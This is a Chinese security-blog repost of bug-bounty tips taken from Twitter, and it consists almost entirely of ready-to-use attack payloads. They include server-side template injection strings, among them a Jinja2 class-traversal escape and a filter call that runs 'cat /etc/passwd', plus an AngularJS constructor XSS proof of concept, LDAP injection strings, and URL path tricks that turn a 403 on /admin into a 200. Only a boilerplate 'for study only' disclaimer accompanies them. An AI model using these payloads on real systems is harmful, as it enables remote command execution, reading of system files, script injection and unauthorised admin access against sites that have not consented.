{2*2}[[7*7]]{{7*7}}{{7*'7'}}<%= 7 * 7 %>{{ request }}{{self}}{{dump(app)}}#{3*3}#{ 3 * 3 }{{ ''.__class__.__mro__[2].__subclasses__() }}{{['cat%20/etc/passwd']|filter('system')}}
原文地址:https://twitter.com/_bughunter/status/1522619419024887809?s=20&t=zoXT_4ZQw1vSYFjj1Lg_vA
[PoC]
hxxp://host/?name={{this.constructor.constructor('alert("foo")')()}}原文地址:https://twitter.com/wugeej/status/1354312840681668610?s=20&t=0hdMZw-sjWsIgybZ0wY4XA
原文地址:https://twitter.com/nxtexploit/status/1524601440635060225?s=20&t=0hdMZw-sjWsIgybZ0wY4XA
原文地址:https://twitter.com/beginnbounty/status/1520420265087610880?s=20&t=0hdMZw-sjWsIgybZ0wY4XA
1. *2. *)(&3. *)(|(&4. pwd)5. *)(|(*6. *))%007. admin)(&)
原文地址:https://twitter.com/ManasH4rsh/status/1520653543119593472?s=20&t=0hdMZw-sjWsIgybZ0wY4XA
GET /admin ==> 403 ForbiddenGET /blablabal/%2e%2e/admin ==> 200 OKGET /blablabal/..;/admin ==> 200 OKGET /blablabal/;/admin ==> 200 OKGET /blablabal/admin/..;/ ==> 200 OKGET /admin?access=1 ==> 200 OK
原文地址:https://twitter.com/_bughunter/status/1525874647652237312?s=20&t=3pL0jy_ZrHfU_Wl055b7vg
文章来源:Hack学习呀
黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!
如侵权请私聊我们删文
END
多一个点在看多一条小鱼干
文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650540687&idx=3&sn=c9e6d250ffd3240cdea571e58048ede0&chksm=83bd6f6bb4cae67d4a0ac0495df6c9ab8ceea72750626329cb50fdb05eb9da69153974f550ad#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh